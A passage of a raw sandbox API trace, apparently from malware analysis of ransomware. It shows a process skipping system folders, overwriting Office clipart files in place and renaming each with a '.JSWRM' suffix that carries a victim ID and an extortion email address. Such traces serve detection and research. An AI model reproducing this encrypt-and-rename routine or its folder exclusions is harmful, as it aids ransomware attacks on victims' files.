hHeap=0x1e0000) returned 1 [0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00526_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00526_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00526_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0078.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0078.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.907] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13538) returned 1 [0078.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x34e0) returned 0x24d210 [0078.907] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x34e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x34e0, lpOverlapped=0x0) returned 1 [0078.910] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.910] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x34e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x34e0, lpOverlapped=0x0) returned 1 [0078.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.910] CloseHandle (hObject=0x314) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0078.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0078.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0078.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0078.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0078.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0078.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0078.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0078.911] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00527_.WMF", cAlternateFileName="")) returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2=".") returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="..") returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="...") returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="windows") returned -1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="recovery") returned -1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="perflogs") returned -1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="documents and settings") returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="system volume information") returned -1 [0078.911] lstrcmpiW (lpString1="HH00527_.WMF", lpString2="msocache") returned -1 [0078.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0078.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00527_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00527_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00527_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0078.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00527_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00527_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00527_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0078.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0078.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0078.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.912] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5798) returned 1 [0078.912] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16a0) returned 0x205850 [0078.912] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16a0, lpOverlapped=0x0) returned 1 [0078.914] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.914] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16a0, lpOverlapped=0x0) returned 1 [0078.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.914] CloseHandle (hObject=0x314) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0078.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0078.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0078.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.915] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0078.915] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe86, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00546_.WMF", cAlternateFileName="")) returned 1 [0078.915] lstrcmpiW (lpString1="HH00546_.WMF", lpString2=".") returned 1 [0078.915] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="..") returned 1 [0078.915] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="...") returned 1 [0078.915] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="windows") returned -1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="recovery") returned -1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="perflogs") returned -1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="documents and settings") returned 1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="system volume information") returned -1 [0078.916] lstrcmpiW (lpString1="HH00546_.WMF", lpString2="msocache") returned -1 [0078.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00546_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00546_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00546_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0078.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00546_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00546_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00546_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0078.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0078.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0078.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.916] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3718) returned 1 [0078.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe80) returned 0x23fc98 [0078.916] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe80, lpOverlapped=0x0) returned 1 [0078.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.918] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe80, lpOverlapped=0x0) returned 1 [0078.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.918] CloseHandle (hObject=0x314) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0078.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0078.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0078.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0078.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0078.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0078.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0078.919] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0078.920] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00601_.WMF", cAlternateFileName="")) returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2=".") returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="..") returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="...") returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="windows") returned -1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="recovery") returned -1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="perflogs") returned -1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="documents and settings") returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="system volume information") returned -1 [0078.920] lstrcmpiW (lpString1="HH00601_.WMF", lpString2="msocache") returned -1 [0078.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00601_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00601_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00601_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00601_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00601_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00601_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0078.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0078.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.921] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1468) returned 1 [0078.921] SetFilePointer (in: 